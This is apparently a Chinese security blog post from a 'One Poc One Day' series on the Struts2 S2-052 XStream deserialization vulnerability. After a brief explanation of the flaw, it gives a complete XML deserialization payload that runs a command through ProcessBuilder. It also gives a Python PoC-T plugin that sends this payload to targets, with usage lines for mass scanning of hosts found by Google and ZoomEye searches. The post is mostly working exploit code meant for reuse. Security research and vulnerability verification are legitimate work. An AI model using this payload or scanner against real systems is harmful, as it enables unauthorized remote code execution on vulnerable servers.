[One Poc One Day]——Struts2 052

izy

2018-08-01 2018-09-19 约 276 字预计阅读 2 分钟

1 # 0x01

One Poc One Day —— Struts2 052

2 # 0x02

2.0.1 ## 原理

Struts2 REST 插件使用带有 XStream 程序的 XStream Handler 进行未经任何代码过滤的反序列化操作，这可能在反序列化XML payloads时导致远程代码执行。任意攻击者都可以构造恶意的XML内容提升权限。

2.0.2 ## Payload

xml

<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>

2.0.3 ## Poc

em……一切为了配合POC-T，多多适配Poc，多多积累自己的script。

python

#!/usr/bin python
# -*- coding: utf-8 -*-
# project = https://github.com/yizhimanpadewoniu
# author = am4zing

"""
Struts2 S2-052
影响版本： Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Usage:
python POC-T.py -s struts2-s2052 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2052 -aZ "login.action"
python POC-T.py -s struts2-s2052 -iF FILE.txt
"""

import requests

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    try:
        header = dict()
        header['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        header['Content-Type'] = "application/xml"
        # header['Accept'] = "*/*"
        header['Connection'] = "close"
        header['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><cipherclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="javax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><string>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceIterator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''
        response_data = requests.post(url, data=payload, headers=header)
        if response_data.status_code == 500 or r"java.security.Provider$Service" in response_data.text:
            return '[s2-052]' + url
        else:
            return response_data.text

    except Exception:
        return False